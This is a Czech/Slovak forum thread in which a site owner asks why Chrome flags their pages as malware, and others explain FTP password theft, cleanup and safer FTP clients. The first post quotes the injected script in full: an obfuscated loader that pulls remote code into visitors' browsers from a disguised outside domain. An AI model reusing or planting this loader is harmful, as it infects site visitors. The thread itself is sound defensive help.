Moje stranky byly v prohlizeci Chrome zabolokovany z duvodu, ze se tam objevil malware http://lelyla.prodejce.cz/ nebo http://lelyla.wz.cz/
Stranky jsou zatim jeste ve vystavbe, takze obsahu a struktury si prosim nevsimejte.
Na dvou mistech a to v souberech s priponou html a php se objevil jakysi podezrely javascript, ktery se tam nejak dostal sam.
<script>/*CODE1*/ try{window.onload = function(){var Q236s4ic4454clw = document.createElement('script');Q236s4ic4454clw.setAttribute('type', 'text/javascript');Q236s4ic4454clw.setAttribute('id', 'myscript1');Q236s4ic4454clw.setAttribute('src', 'h(t)!^t^))p#@:&&/(##/&$#c^$$l^@)(i&(c$^)k))#$s^o$#r!^)^-$$$&c@$o#^m$!#.#&(e((a!s)(@t)&m((o@^^n!$!e&^&(y$#).#&c$@o$@!$^m(##(.@m@o@(b(^i&#l#!@e@)@&(-(d)&(e^&@(.))@&h)@@@o^^@m!e#&&)s)a#$$l$$#e^@!p^@l&@u#((^s^#@(.$)r$$u(:!$8!$0&$&8)@$0$!)/!o#&@c##@@n(@^!.))n@e@.)&j!@^#$p#/)^@o^c^n)((.()n^)e^$.@!)$j!^(p#!/@&)c^(l&(a&s(^s@!m^@a($^t#e!#^@)s$.^c^&#o((&m&/)(&@l&()i(@n)(k$@h&e)@$(l)$p^!e)$!$r$#.)&c!&n($@/$g#o^@&o!$$g$^l^&#@e$.&&!c#o@$$m(/$$'.replace(/\(|\!|&|#|\$|\)|@|\^/ig, ''));Q236s4ic4454clw.setAttribute('defer', 'defer');document.body.appendChild(Q236s4ic4454clw);}} catch(e) {}</script>
Nechapu jak se neco takoveho muze samo dostat do statickeho html souboru.
Muzete s tim neco udelat? Pripadne mi rici co ja mohu udelat aby se tak nedelo. Dekuji
Je to jednoduché. Váš počítač je zavirován.
Nějaká havěť ve Vašem počítači si získala heslo k FTP (nejčastěji přes Total Commander) a to pošle kolegovi (další havěť). Kolega na jiném počítači toho pak využije a na Vaše stránky vloží škodlivý kód. A provádí to pravidelně. Takže odstraněním škodlivého kódu to nekončí.
Ze všeho nejvíc zkontrolujte počítač na přítomnost viru a neprodleně změňte heslo k přístupu na FTP. Toto heslo pak nikam neukládejte. Jedině do hlavy nebo raději na papír.
A proč bychom s tím měly něco dělat? My jsem tam ten vir nedali.
<HTML>Odvirovat pc, pak změnit heslo (a nenechávat ho uložené v ftp klinetovi) a nahrát soubory znovu.
http://www.webzdarma.cz/forum/read.php?f=6&i=55373&t=55373
http://www.webzdarma.cz/forum/read.php?f=6&i=58626&t=58622
http://www.webzdarma.cz/forum/read.php?f=6&i=58734&t=58734
atd. viz Hledání.</HTML>
Diky za radu . Samozrejme ze s timto vy nic delat nemuzete
Existuje nejaky bezpecnejsi ftp klient, kde by se dala hesla ukladat?
Paradoxně ty, které nejsou známe ;)
Ale raději takové, které znemožňuji snadné získání hesla. To znamená, že hesla ukládají šifrovaně a lépe ještě opatřené klíčem (hlavním heslem).
Do této skupiny zásadně nepatří Total Commader do verze 6. Ten bývá právě hlavním viníkem zavirování. Nová verze TC7 hesla už šifruje, ale nevím nakolik je spolehlivý.
ja mam podobny problem....mojej znamej sa na mojej stranke zobrazuje tez ze ma malware, ale mne nie je sice pravda ze mam linux..nwm ci to s tym suvisis...ale ja nemam v skripte ziaden podozrivy kod..nic som nenasla...co mam robit aby sa jej to nezobrazovalo? viete vyzera to tak ze ja nemam zavireny comp ale nekedy adminujem stranku aj v skole a tam nwm ako su na tom compy....pls pomozte mi...diki
Viz předchozí příspěvek od Thalie.
Nemít ve stránce podezřelé javascriptové kódy lze chápat jako slušnost vůči návštěvníkům. Navíc většina dnešních prohlížečů k takovýmto stránkám přístup omezuje (minimálně vyhazuje varování), takže se autor sám přípravuje o zákazníky/návštěvníky. A kromě prohlížečů přístupům k takovýmto stránkám blokují i antivirové programy - například avast! blokuje přístup i k tomuto vláknu (přestože ten "podezřelý" kód je jako klasický obsah).
___
Jinak pro zajímavost - většina těch vkládaných skriptů dělá pouze jednu věc - pouze ve stránce vytváří iframe, který načítá další (mnohem větší) javascripty z jiných domén (většinou Čína a Rusko). Činnost těch dále načítaných skriptů už je na delší povídání ;)
vicky: PC ve školách často bývají zavirované. Proto se na administraci školní počítače nehodí. Navíc je tam riziko odchycení hesla, pokud nepoužíváš SFTP nebo alespoň FTPS.
Na tvé stránce žádný malware nevidím.